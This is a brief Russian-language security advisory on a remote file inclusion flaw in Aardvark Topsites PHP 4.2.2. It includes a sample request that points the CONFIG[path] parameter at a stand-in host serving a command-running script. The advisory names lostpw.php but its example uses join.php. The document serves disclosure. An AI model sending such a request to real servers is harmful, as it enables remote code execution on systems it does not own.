Программа: Aardvark Topsites PHP 4.2.2, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "CONFIG[path]" в сценарии sources/lostpw.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной
эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

/sources/join.php?FORM[url]=owned&CONFIG[captcha]= 1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии